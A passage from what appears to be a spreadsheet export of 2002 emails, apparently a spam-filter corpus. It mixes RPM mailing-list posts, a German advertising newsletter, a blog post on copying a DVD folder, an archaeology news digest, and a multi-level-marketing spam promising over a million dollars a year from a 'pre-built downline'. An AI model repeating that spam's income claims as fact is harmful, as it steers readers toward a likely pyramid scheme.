 This sf.net email is sponsored by: Dice - The leading online job board
 for high-tech professionals. Search and apply for tech jobs today!
 http://seeker.dice.com/seeker.epl?rel_code=31
 _______________________________________________
 Spamassassin-devel mailing list
 Spamassassin-devel@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-01 at 11:51, Matthias Saou wrote:
 &gt; Sorry, this hasn't got much to do with rpm packages directly ;-)
 &gt; 
 &gt; My "builds" page is getting bigger and bigger, and quite messy as
 &gt; directories are listed in no particular order :
 &gt; http://freshrpms.net/builds/
 &gt; 
 &gt; What I'd need is to have last modification date of the directory displayed
 &gt; next to the directory name (sort of like "mplayer - Thu Aug 1 2002"), and
 &gt; the list ordered to have the most recent entries at the top.
 Take a look at
 &lt;http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jpackage/website/htdocs/functions.php?rev=1.6&amp;content-type=text/vnd.viewcvs-markup&gt;, that's what produces the list at &lt;http://jpackage.sourceforge.net/packages.php&gt;.  Dirs are sorted alphabetically there, but I guess sorting by date wouldn't be that hairy...
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">At 2:57 PM -0700 on 9/23/02, Mr. FoRK wrote:
 &gt; I just had a run-in with a neighbor whom I've never met before who
 &gt; pigeonholed me within one minute after I asked a question - he said 'Are you
 &gt; one of them environmentalists?' &lt;snip&gt;
 &gt;
 &gt; Sheesh... I've been out of work too long...
 We'll ignore the possibility of a correlation here in the interest of
 charity...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</si>
  <si>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F2M - Ihre kostenlose Faxnummer - Newsletter
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE -//w3c//dtd 4.01 html http://www.w3c.org/TR/1999/REC-html401-1=
 9991224/loose.dtd public transitional//en&gt; &lt;HTML&gt;&lt;HEAD&gt; &lt;META http-equiv=
 =3D"Content-Type" content=3D"text/html; charset=3Diso-8859-1"&gt;
  &lt;meta name=3DGENERATOR content=3D"messageREACH intelliSEND Wizard 3.0.2=
 .7"&gt;
  &lt;meta name=3DProgId content=3D"intelliSEND_Wizard.Editor.Document"&gt;
 &lt;/HEAD&gt; &lt;BODY style=3D"FONT-SIZE: 8pt; COLOR: #000000; FONT-FAMILY: Aria=
 l" bgcolor=3D"#ffffff"&gt;Bitte beachten Sie die Angebote unserer Werbepart=
 ner.&lt;br&gt;=20
 Diese erm=F6glichen den kostenfreien Betrieb des Fax2Mail-Service.&lt;br&gt;=20
 Vielen Dank.&lt;br&gt;=20
  &lt;TABLE width=3D"700" cellspacing=3D"2" cellpadding=3D"2" border=3D"0" b=
 gcolor=3D"#ffffff" background bordercolor=3D"#000000" bordercolordark=
 =3D"#000000" bordercolorlight=3D"#000000" mreach_id&gt; &lt;CAPTION&gt;&lt;/CAPTION&gt;=
  &lt;TBODY&gt;=20
 &lt;TR&gt; &lt;TD&gt; &lt;TABLE width=3D"100%" cellspacing=3D"2" cellpadding=3D"2" bord=
 er=3D"0" bgcolor=3D"#ffffff" background bordercolor=3D"#000000" borderco=
 lordark=3D"#000000" bordercolorlight=3D"#000000" mreach_id&gt; &lt;CAPTION&gt;&lt;/C=
 APTION&gt; &lt;TBODY&gt;=20
 &lt;TR&gt; &lt;TD&gt;&lt;!--messageREACH-object-start--&gt;&lt;IMG src=3D"https://pull.xmr3.c=
 om/p/24365-2B45/40111777/katalog_titel_dhtml7578_10.jpg" hspace=3D"0" bo=
 rder=3D"0" alt align=3D"baseline" mreach_id=3D"picture1"&gt;&lt;!--messageREAC=
 H-object-end--&gt;&lt;/TD&gt;&lt;/TR&gt;=20
 &lt;TR&gt; &lt;TD&gt;=20
 &lt;P&gt;&lt;FONT color=3D"#ff0000"&gt;&lt;STRONG&gt;Der neue Cyberport-Katalog ist da!&lt;/S=
 TRONG&gt;&lt;/FONT&gt;&lt;/P&gt;=20
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;=20
 &lt;P&gt;&lt;FONT size=3D"2"&gt;Reinschauen ist jetzt auch offline m=F6glich, mit de=
 m druckfrischen Cyberport-Katalog.&lt;BR&gt;
 St=F6bern Sie in unserem Angebot, wann und wo Sie wollen. Entdecken Sie =
 auf 322 Seiten&lt;BR&gt;
 sechs interessante Einkaufswelten, randvoll mit topaktuellen Highlights =
 rund um den &lt;BR&gt;
 Computer, Telekommunikation und Multimedia - nat=FCrlich zu absoluten Ha=
 mmerpreisen.&lt;/FONT&gt;&lt;/P&gt;=20
 &lt;P&gt;&lt;FONT size=3D"2"&gt;Bitte registrieren Sie sich hier &lt;!--messageREACH-ob=
 ject-start--&gt;&lt;A href=3D"http://www.cyberport.de/?DEEP_DOCID=3D7578" mrea=
 ch_id=3D"hyperlink2"&gt;&lt;IMG src=3D"https://pull.xmr3.com/p/24365-2B45/4011=
 1779/pfeilchen_dhtml7578_10.gif" border=3D"0" mreach_id=3D"hyperlink2"&gt;&lt;=
 /A&gt;&lt;!--messageREACH-object-end--&gt;&lt;/FONT&gt;&lt;/P&gt;=20
 &lt;P&gt;&lt;FONT size=3D"2"&gt;Und hier unsere Shops im =DCberblick:&lt;/FONT&gt;&lt;/P&gt;&lt;/TD=
 &gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt; &lt;TABLE width=3D"100%" cellspacing=3D"8" cellpaddi=
 ng=3D"6" border=3D"0" bgcolor=3D"#ffffff" background bordercolor=3D"#000=
 000" bordercolordark=3D"#000000" bordercolorlight=3D"#000000" mreach_id&gt;=
  &lt;CAPTION&gt;&lt;/CAPTION&gt; &lt;TBODY&gt;=20
 &lt;TR&gt; &lt;TD valign=3D"center" background align=3D"left" mreach_id&gt;&lt;!--messa=
 geREACH-object-start--&gt;&lt;IMG src=3D"https://pull.xmr3.com/p/24365-2B45/40=
 111783/s_mac_dhtml7578_10.jpg" hspace=3D"0" border=3D"0" alt align=3D"ba=
 seline" mreach_id=3D"picture3"&gt;&lt;!--messageREACH-object-end--&gt;&lt;/TD&gt; &lt;TD&gt; =
 &lt;P&gt;&lt;FONT size=3D"2"&gt;&lt;STRONG&gt;Mac-Shop =96 Cyberdesign f=FCr jeden Tag&lt;/ST=
 RONG&gt;&lt;BR&gt;
 &amp;nbsp;&lt;BR&gt;
 Ein Paradies f=FCr Apple-Fans! Ob iMac, iBook &lt;BR&gt;
 oder PowerMac: Hier finden Sie die &lt;BR&gt;
 aktuellsten Modelle =96 und dazu jede Menge &lt;BR&gt;
 Software und Peripherie =96 vom Cinema &lt;BR&gt;
 Display =FCber Foto-Drucker bis zum neuen &lt;BR&gt;
 iPod!&lt;/FONT&gt; &lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;=20
 &lt;TR&gt; &lt;TD valign=3D"center" background align=3D"left" mreach_id&gt;&lt;!--messa=
 geREACH-object-start--&gt;&lt;IMG src=3D"https://pull.xmr3.com/p/24365-2B45/40=
 111789/s_pc_dhtml7578_10.jpg" hspace=3D"0" border=3D"0" alt align=3D"bas=
 eline" mreach_id=3D"picture4"&gt;&lt;!--messageREACH-object-end--&gt;&lt;/TD&gt; &lt;TD&gt;&lt;B=
 R&gt;
 &lt;P&gt;&lt;STRONG&gt;P&lt;/STRONG&gt;&lt;FONT size=3D"2"&gt;&lt;STRONG&gt;C-Shop =96 Power satt f=
 =FCr mehr Souver=E4nit=E4t&lt;/STRONG&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT size=3D"2"&gt;Nat=FCrlich kommen Sie bei uns auch als PC-&lt;BR&gt;
 User voll auf Ihre Kosten: Wir bieten Ihnen &lt;BR&gt;
 leistungsstarke PC-Komplettsysteme f=FCr &lt;BR&gt;
 Home- und Business-Anwendungen, Super-&lt;BR&gt;
 Zusatzkomponenten f=FCr Gamer und &lt;BR&gt;
 Multimedia-Freaks sowie Top-Endger=E4te und &lt;BR&gt;
 Zubeh=F6r vom Foto-Scanner bis zum TFT-Display&lt;/FONT&gt;!&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;=20
 &lt;TR&gt; &lt;TD valign=3D"center" background align=3D"left" mreach_id&gt;&lt;!--messa=
 geREACH-object-start--&gt;&lt;IMG src=3D"https://pull.xmr3.com/p/24365-2B45/40=
 111785/s_mobile_dhtml7578_10.jpg" hspace=3D"0" border=3D"0" alt align=
 =3D"baseline" mreach_id=3D"picture5"&gt;&lt;!--messageREACH-object-end--&gt;&lt;/TD&gt;=
  &lt;TD&gt;&lt;BR&gt;
 &lt;P&gt;&lt;FONT size=3D"2"&gt;&lt;STRONG&gt;Mobile-Shop =96 neueste Technik f=FCr &lt;BR&gt;
 grenzenlose Mobilit=E4t &lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;=20
 &lt;P&gt;&lt;FONT size=3D"2"&gt;Willkommen in der mobilen Zukunft! Ob &lt;BR&gt;
 Notebook oder PDA, Handy oder &lt;BR&gt;
 Navigationssystem: Bei uns finden Freunde &lt;BR&gt;
 des mobilen Lebens f=FCr jeden Zweck das &lt;BR&gt;
 optimale Angebot =96 f=FCr mehr Freiheit unterwegs&lt;/FONT&gt;!&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;=
 =20
 &lt;TR&gt; &lt;TD valign=3D"center" background align=3D"left" mreach_id&gt;&lt;!--messa=
 geREACH-object-start--&gt;&lt;IMG src=3D"https://pull.xmr3.com/p/24365-2B45/40=
 111787/s_netzwerk_dhtml7578_10.jpg" hspace=3D"0" border=3D"0" alt align=
 =3D"baseline" mreach_id=3D"picture6"&gt;&lt;!--messageREACH-object-end--&gt;&lt;/TD&gt;=
  &lt;TD&gt;&lt;BR&gt;
 &lt;P&gt;&lt;FONT size=3D"2"&gt;&lt;STRONG&gt;Network-Shop =96 Effizienz von Profis f=FCr =
 &lt;BR&gt;
 Profis&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;=20
 &lt;P&gt;&lt;FONT size=3D"2"&gt;Die ganze Welt von LAN, Switches, Router &amp;amp; &lt;BR&gt;
 Co. Hier gibt=92s ma=DFgeschneiderte Netzwerk-&lt;BR&gt;
 L=F6sungen f=FCr den privaten wie professionellen &lt;BR&gt;
 Bedarf =96 von der einfachen Netzwerkkarte bis &lt;BR&gt;
 zum Wireless LAN mit Internetzugang, &lt;BR&gt;
 Printserver und integrierter Firewall f=FCr &lt;BR&gt;
 maximale Sicherheit!&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;=20
 &lt;TR&gt; &lt;TD valign=3D"center" background align=3D"left" mreach_id&gt;&lt;!--messa=
 geREACH-object-start--&gt;&lt;IMG src=3D"https://pull.xmr3.com/p/24365-2B45/40=
 111781/s_audio_dhtml7578_10.jpg" hspace=3D"0" border=3D"0" alt align=3D"=
 baseline" mreach_id=3D"picture7"&gt;&lt;!--messageREACH-object-end--&gt;&lt;/TD&gt; &lt;TD=
 &gt;&lt;BR&gt;
 &lt;P&gt;&lt;STRONG&gt;V&lt;/STRONG&gt;&lt;FONT size=3D"2"&gt;&lt;STRONG&gt;ideo/Audio-Shop =96 alle F=
 reiheit f=FCr Ihre &lt;BR&gt;
 W=FCnsche&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;=20
 &lt;P&gt;&lt;FONT size=3D"2"&gt;Ob Digital-Foto und -Video, MP3, DVD oder &lt;BR&gt;
 Breitband-TV: Wir pr=E4sentieren Ihnen die &lt;BR&gt;
 absoluten High-Tech-Hits von SONY, Denon, &lt;BR&gt;
 JVC, Panasonic, Toshiba und vielen anderen &lt;BR&gt;
 Top-Marken. Selbstverst=E4ndlich zu &lt;BR&gt;
 atemberaubend g=FCnstigen Preisen!&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;=20
 &lt;TR&gt; &lt;TD valign=3D"center" background align=3D"left" mreach_id&gt;&lt;!--messa=
 geREACH-object-start--&gt;&lt;IMG src=3D"https://pull.xmr3.com/p/24365-2B45/40=
 111791/s_software_dhtml7578_10.jpg" hspace=3D"0" border=3D"0" alt align=
 =3D"baseline" mreach_id=3D"picture8"&gt;&lt;!--messageREACH-object-end--&gt;&lt;/TD&gt;=
  &lt;TD&gt;&lt;BR&gt;
 &lt;P&gt;&lt;FONT size=3D"2"&gt;&lt;STRONG&gt;Software-Shop =96 f=FCr mehr Vielfalt und &lt;B=
 R&gt;
 mehr Innovation &lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;=20
 &lt;P&gt;&lt;FONT size=3D"2"&gt;Ob Betriebssystem oder Office-Suite, DTP &lt;BR&gt;
 oder Multimedia, Video-Bearbeitung oder &lt;BR&gt;
 aktuelle Games: Wir bieten Ihnen die perfekte &lt;BR&gt;
 L=F6sung f=FCr jede denkbare PC-Anwendung. &lt;BR&gt;
 Nat=FCrlich inklusive Update- und &lt;BR&gt;
 Schulversionen sowie top-aktuellen &lt;BR&gt;
 Handb=FCchern f=FCr Einsteiger und Profis!&lt;BR&gt;
 &lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt; &lt;TABLE width=3D"100%" cellspacing=
 =3D"2" cellpadding=3D"2" border=3D"0" bgcolor=3D"#ffffff" background bor=
 dercolor=3D"#000000" bordercolordark=3D"#000000" bordercolorlight=3D"#00=
 0000" mreach_id&gt; &lt;TBODY&gt;=20
 &lt;TR&gt; &lt;TD&gt;&lt;BR&gt;
 &lt;P&gt;&lt;FONT size=3D"2"&gt;Welche DVD-Formate gibt es? Wie funktioniert eine Wi=
 reless LAN-Verbindung? Diese und &lt;BR&gt;
 viele weitere Fragen werden gekl=E4rt. Wenn Sie noch keinen Katalog besi=
 tzen, dann bestellen &lt;BR&gt;
 Sie schnell und nehmen Sie sich etwas Zeit f=FCr die neuesten Produkte d=
 er Technik.&lt;/FONT&gt;&lt;/P&gt;&lt;FONT size=3D"2"&gt;=20
 &lt;P&gt;F=FCr Ihre Kataloganforderung erhalten Sie von uns einmalig&lt;BR&gt;
 einen Warengutschein in H=F6he von 5 EUR.&lt;/P&gt;=20
 &lt;P&gt;&lt;/FONT&gt;&lt;FONT size=3D"2"&gt;&lt;BR&gt;
 Bitte registrieren Sie sich hier:&lt;!--messageREACH-object-start--&gt;&lt;A href=
 =3D"http://www.cyberport.de/?DEEP_DOCID=3D7578" mreach_id=3D"hyperlink9"=
 &gt;&lt;IMG src=3D"https://pull.xmr3.com/p/24365-2B45/40111779/pfeilchen_dhtml=
 7578_10.gif" border=3D"0" mreach_id=3D"hyperlink9"&gt;&lt;/A&gt;&lt;!--messageREACH-=
 object-end--&gt; &lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;=20
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;=20
 &lt;P&gt;&lt;!--messageREACH-object-start--&gt;&lt;A href=3D"http://www.xmr3.com/sf/270=
 241-5399979-2-24365-DE1-3F5B" mreach_id=3D"sendfriend10"&gt;&lt;FONT size=3D"2=
 "&gt;M=F6chten Sie diese Mail weiterleiten dann klicken Sie hier&lt;/FONT&gt;&lt;/A&gt;=
 &lt;!--messageREACH-object-end--&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;=20
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;=20
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;Wenn Sie den Newsletter nicht mehr erhalten wollen, m=FCsse=
 n Sie sich &lt;br&gt;
 komplett vom Fax2Mail Service abmelden. Gehen Sie hierzu auf &lt;br&gt;
 http://f2m.xpedite.de Im Bereich 'Setup' k=F6nnen Sie sich =FCber &lt;br&gt;
 den Knopf 'Daten l=F6schen' abmelden. &lt;br&gt;
 Mit freundlichen Gr=FC=DFen&lt;br&gt;
 Ihr F2M Team&lt;br&gt;
 Dies ist ein Service der XPEDITE Systems GmbH verschickt =FCber das&lt;br&gt;
 messageREACH-System.&lt;br&gt;
 Weitere Informationen finden Sie unter http://f2m.xpedite.de&lt;br&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;=20
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Find all files that aren't in package.
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to find all files on the box that do not belong to any rpm
 package?
 Thanks
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "Scott Wood" &lt;skitster@hotmail.com&gt;
 To: &lt;zzzzteana@yahoogroups.com&gt;
 Sent: Monday, October 07, 2002 6:51 AM
 Subject: [zzzzteana] Re: Megalithomania UnPissup
 &gt; --- In forteana@y..., "Webmaster" &lt;webmaster@b...&gt; wrote:
 &gt; &gt;Right...Talking Stick!..but what the hell is "marathon/snickers, jif/cif
 &gt; &gt;and
 &gt; &gt;calls itself 'Secret Chiefs' "
 &gt; &gt;
 &gt; &gt;DRS
 &gt; &gt;
 &gt;
 &gt; Rebranding: taking something and changing nothing about it except its
 name.
 &gt; In the UK Marathon bars became Snickers bar, Jif cleaning fluid became Cif
 &gt; and Talking Stick became Secret Chiefs, y'know?
 &gt;
 &gt; Scott
 &gt; "at once a fun fair, a petrified forest, and the great temple of Amun at
 &gt; Karnak, itself drunk, and reeling in an eccentric earthquake"
 &gt;
 &gt;
 &gt; _________________________________________________________________
 &gt; Join the world's largest e-mail service with MSN Hotmail.
 &gt; http://www.hotmail.com
 &gt;
 &gt;
 &gt;
 &gt; To unsubscribe from this group, send an email to:
 &gt; forteana-unsubscribe@egroups.com
 &gt;
 &gt;
 &gt;
 &gt; Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
 &gt;
 &gt;
 &gt;
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Home Selling? Try Us!
 http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Freedom - $1,021,320.00 per year.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
   I would like you to enjoy the same success
 that I have had, since joining this program for FREE.
 Cost you nothing to join!
   PRE-BUILT DOWNLINE:  A full (2 wide x 10 deep) profit center will have 
 a total of 2,046 people and a payout of up to $1,021,320.00 per year.
 The FASTEST way for us to help you build a HUGE DOWNLINE is to give away 
 FREE MEMBERSHIPS to highly motivated prospects, like you, 
 and help build a downline under them. 
  This is the FASTEST and MOST COST-EFFECTIVE WAY 
 to build a productive downline! 
     WE ARE CURRENTLY RECRUITING OVER 1,000 NEW MEMBERS 
 PER WEEK WITH OUR LIGHTNING FAST RECRUITING SYSTEM!!!
 Go to:
 http://www.ircinconline.com/isb.htm
 Code Number  000-01-3118
 PS... After I received my info pack, the company already 
 had placed 30 people under me
 _________________________________________________________________
  DISCLAIMER 
 To REMOVE yourself from my data base please hit REPLY and insert
 REMOVE in the subject box.
 7211iAHr5-883Pbxd6893ZUNf7-464YxFl31
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Apple: Heinous DVD Pirates
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000644
 Date: 2002-10-08T01:21:33-06:00
 DeCSS detractors have repeatedly claimed that DeCSS needs to be stopped because 
 it makes perfect digital copies of DVDs possible. Recently, in private email, 
 Ernest Miller claimed that doing so would be a violation of the DMCA. In this 
 in-depth special report, I show that using perfectly legal, (I assume) 
 licensed, off-the-shelf consumer software, copying DVDs is easy and in many 
 ways encouraged. 
 *Tools:*
 1 PowerBook G4 with slot-loading DVD drive (any model should work)
 1 Monsters, Inc. Collector's Edition DVD (any DVD should work)
 1 copy of Mac OS X 10.2 "Jaguar" 
 *Process:*
 1. Insert DVD into drive. Notice how Jaguar helpfully loads the DVD Player for 
 you.
 2. Open the DVD (it appears on the desktop) and drag the VIDEO_TS folder to 
 your hard drive. Ejct the DVD.
 3. In DVD Player, select "Open VIDEO_TS Folder..." from the File menu. Use the 
 dialog that appears to select the VIDEO_TS folder on your hard drive. 
 Now the DVD plays just like it would were the DVD in the drive. By extension, I 
 could also put the DVD up on my site for you to download and watch. I could 
 share it via a P2P network. And I haven't done anything to decrypt the DVD or 
 violate the DMCA: I've used only basic tools available to all normal computer 
 users on my (I assume) fully-licensed consumer laptop. 
 *Disclaimer:* Seth Schoen, whose opinion I highly respect on these matters, 
 finds it unlikely that the DVD was CSS-encrypted if this was possible. I am not 
 sure how to verify if the DVD is CSS-encrypted. If someone has a suggestion, 
 please let me know. However, if it is true, then it's very interesting that 
 Disney has released such a major movie without encryption.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [forteana] Fwd: Explorator 5.15
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ================================================================
 explorator 5.15                                  August 15, 2002
 ================================================================
 Editor's note: Depending on your mail software, some urls may
 wrap (especially those from the Telegraph) which will require
 you to rebuild the url at your end; if you get a 'file not
 found', check to see if the url wrapped on you. Most urls should
 be active for at least eight hours from the time of publication.
 ================================================================
 ================================================================
 Thanks to Bill Thayer, Ross Sargent, 'Salinas17', Michael Ruggieri,
 Maurice O'Sullivan, Terry Gibson, 'mb2400', Bill Kennedy, Paul James
 Cowie, Arthur Shippee, Joseph Nicholas, W. Richard Frahm,'alesmonetos',
 and Sally Winchester for headses upses this week (a.a.h.i.h.l.n.o.o.)
 n.b. Last week I carelessly suggested the team which had claimed
 to have found El Dorado was Polish; it is, in fact, an international
 team led by a "Polish-Italian" journalist/explorer. Apologies for
 any confusion this may have caused.
 ================================================================
 ================================================================
 AFRICA, EUROPE, AND ASIA
 ================================================================
 John Noble Wilford attempts to clarify the Chadian skull thing:
 http://www.nytimes.com/2002/08/06/science/06SKUL.html
 In the what-can-DNA-tell-us-about-antiquity department, the latest
 suggestion is that there is genetic evidence "middle easter farmers
 'civilised' Europe":
 http://www.newscientist.com/news/news.jsp?id=ns99992634
 http://portal.telegraph.co.uk/news/main.jhtml?xml=%2Fnews%2F2002%2F08%2F06%2Fngene06.xml
 A log boat which might date to 3000 B.C. has been found off the
 coast of Ireland:
 http://www.ireland.com/newspaper/ireland/2002/0805/2854861586HM2LOGBOAT.html
 http://www.unison.ie/irish_independent/index.php3?ti=41&amp;ca=9&amp;si=801897&amp;issue_id=7825
 The Cerne Abbas Giant was recently, er, 'defaced' (not permanently ...
 potentially offensive content in this one):
 http://story.news.yahoo.com/news?tmpl=story2&amp;u=/nm/20020806/od_nm/sex_dc_1
 Satellite technology has revealed a prehistoric site near
 Northumberland:
 http://news.bbc.co.uk/2/hi/england/2178530.stm
 ... and a prehistoric cemetery has been found near Cheshire:
 http://www.ananova.com/news/story/sm_644681.html
 They're still making significant finds in the 'workers village'near
 the pyramids:
 http://news.nationalgeographic.com/news/2002/08/0805_020805_giza.html
 Gulf News has a nice feature on the alignment of a Dilmun temple at
 Saar:
 http://www.gulf-daily-news.com/arc_Articles.asp?Article=29638&amp;Sn=BNEW&amp;IssueID=25142
 Plenty of coverage of a story on Bronze Age 'drug trade':
 http://www.abcnews.go.com/wire/World/ap20020807_922.html
 http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20020808/ap_wo_en_po/israel_ancient_narcotics_1
 http://stacks.msnbc.com/news/791265.asp
 http://europe.cnn.com/2002/WORLD/meast/08/08/ancientnarcotics.ap/index.html
 http://www.jpost.com/servlet/Satellite?pagename=JPost/A/JPArticle/ShowFull&amp;cid=1028814634905
 The Egyptian Museum in Cairo will be marking its centennial by
 hauling up a bunch of never-before-seen artifacts from the basement:
 http://story.news.yahoo.com/news?tmpl=story&amp;u=/nm/20020805/sc_nm/leisure_egypt_museum_dc_1
 http://www.chron.com/cs/CDA/story.hts/world/1522113
 Another piece on politics and archaeology in the Holy Land:
 http://www.orlandosentinel.com/news/nationworld/orl-asecisraeldig04080402aug04.story
 ... while archaeologists seem to be quietly excavating a Byzantine
 monastery in Gaza:
 http://www.ekathimerini.com/4dcgi/news/content.asp?aid=19621
 A first century cemetery has come to light near Palmyra:
 http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20020809/ap_wo_en_ge/syria_archaeology_1
 A human-size statue of Baal Addir was recently revealed in a Sardinian
 context:
 http://www.news.com.au/common/story_page/0,4057,4855902%255E1702,00.html
 A Celtic Iron Age fort in Wales is "revealing its secrets":
 http://news.bbc.co.uk/2/hi/wales/2178489.stm
 A large number of Eastern Zhou Dynasty tombs have been found in
 China:
 http://news.xinhuanet.com/english/2002-08/10/content_519198.htm
 ... as has an important tomb of an aristocrat:
 http://www1.chinadaily.com.cn/news/lf/2002-08-11/81655.html
 Four Buddhas have been found hidden inside another Buddha rarely
 seen by the public:
 http://www.ananova.com/news/story/sm_643946.html
 Sanskrit is in danger of becoming extinct:
 http://news.bbc.co.uk/2/hi/south_asia/2173400.stm
 There's a battle brewing over the fate of the "Welsh Mary Rose":
 http://www.guardian.co.uk/arts/news/story/0,11711,771543,00.html
 http://news.bbc.co.uk/2/hi/wales/2183191.stm
 ================================================================
 THE AMERICAS
 ================================================================
 There is evidence of pre-Columbian dentistry in Mexico:
 http://www.thenewsmexico.com/printedformat.asp?id=31882
 Bones found near Lake Jackson (Texas) might be 11,000 years old:
 http://www.chron.com/cs/CDA/printstory.hts/metropolitan/1528019
 A nice report on excavations near Fort Vancouver:
 http://www.canoe.ca/NationalTicker/CANOE-wire.Bay-Dig.html
 Home construction in Virginia has revealed the grave of a slave:
 http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20020808/ap_wo_en_ge/us_slave_remains_1
 ================================================================
 ON THE NEWSSTANDS
 ================================================================
 A new issue of Bible Review, with online articles on a collection
 of New Testament manuscripts, the Exodus debate, and other things:
 http://www.bib-arch.org/bswb_BR/indexBR.html
 ... and Archaeology Odyssey, with articles on the ten most endangered
 archaeological sites, Moses Shapira (wow), et alia:
 http://www.bib-arch.org/bswb_AO/indexAO.html
 ================================================================
 ON THE WEB
 ================================================================
 I came across the Into Archaeology website this week; it's worth a 
 look for a number of reasons, but in particular its articles section
 has some good stuff (currently, an interview with Adrienne Mayor, a
 piece
 on the Thera ships, and a piece on the work at Bird Cove):
 http://www.intoarch.com/
 The Oriental Institute has recently added a whole pile of publically-
 accessible articles to its News and Notes section:
 http://www-oi.uchicago.edu/OI/DEPT/PUB/NewsAndNotes.html
 ================================================================
 NEW ONLINE BOOKS
 ================================================================
 George Dennis, *Cities and Cemeteries of Etruria*:
 http://www.ukans.edu/history/index/europe/ancient_rome/E/Gazetteer/Places/Europe/Italy/.Periods/Roman/Archaic/Etruscan/.Texts/DENETR*/home.html
 Horace, *Odes and Carmen Saeculare* (Conington trans.):
 http://digital.library.upenn.edu/webbin/gutbook/lookup?num=5432
 Horace, *Satires, Epistles, and Ars Poetica* (Conington trans.):
 http://digital.library.upenn.edu/webbin/gutbook/lookup?num=5419
 ================================================================
 ON  THE ARCHAEOLOGY CHANNEL
 ================================================================
 Calleva: The Roman Town of Silchester:
 http://www.archaeologychannel.org/
 ================================================================
 CRIME BEAT
 ================================================================
 There are claims that recent Al-Qaeda casualties were actually
 potential antiquity thieves:
 http://europe.cnn.com/2002/WORLD/asiapcf/central/08/07/afghan.gunfights/index.html
 ================================================================
 AT ABOUT.COM
 ================================================================
 ... can't seem to connect today (hmmmmm...)
 ================================================================
 REVIEWS
 ================================================================
 Iain Pears, *Dream of Scipio*:
 http://www.nytimes.com/2002/08/07/books/07PEAR.html
 http://www.nytimes.com/2002/06/23/books/review/23CROWLET.html
 Tony Perrottet, *Route 66 A.D.: On the Trail of Ancient Roman Tourists* 
 http://seattletimes.nwsource.com/html/artsentertainment/134447835_route66ad05.html
 Anton Powell, * Athens and Sparta: Constructing Greek political and
 social history from 478 BC*
 http://www.athensnews.gr/athweb/nathens.print_unique?e=C&amp;f=12974&amp;m=A19&amp;aa=2&amp;eidos=S
 Antigone (Epidavros):
 http://www.ekathimerini.com/4dcgi/news/content.asp?aid=19644
 ================================================================
 EXHIBITIONS
 ================================================================
 Treasures from a Lost Civilization (Toronto):
 http://story.news.yahoo.com/news?tmpl=story&amp;u=/nm/20020809/wl_canada_nm/canada_arts_china_col_1
 ================================================================
 CLASSICIST'S CORNER
 ================================================================
 Famed debunker James Randi has been running a series on Lucian's
 debunking of  Alexander of Abonutichus which is worth a look. 
 It's in four parts (you'll have to skim through some other, readable,
 stuff to get to the bits on Lucian ... it tends to be near the end):
 http://www.randi.org/jr/071902.html
 http://www.randi.org/jr/072602.html
 http://www.randi.org/jr/080202.html
 http://www.randi.org/jr/080902.html
 In case you meet someone who asks, "What's all the hubbub about those
 Elgin Marbles?", here's a nice article to hand them:
 http://www.japantimes.co.jp/cgi-bin/getarticle.pl5?fv20020806a1.htm
 Classical precedents cited in a piece on gossip:
 http://www.nytimes.com/2002/08/10/arts/10GOSS.html
 Latin content in a story of a man with way too much time on his hands:
 http://www.guardian.co.uk/international/story/0,3604,770241,00.html
 How not to pursue a classics degree:
 http://www.thisisoxfordshire.co.uk/oxfordshire/news/NEWS6.html
 Some guy is studying why ancient Greek buildings seem to do so well
 in earthquakes (do they?):
 http://www.ekathimerini.com/4dcgi/news/content.asp?aid=19704
 A reader alerted me to LewRockwell.com, this week, which is a political
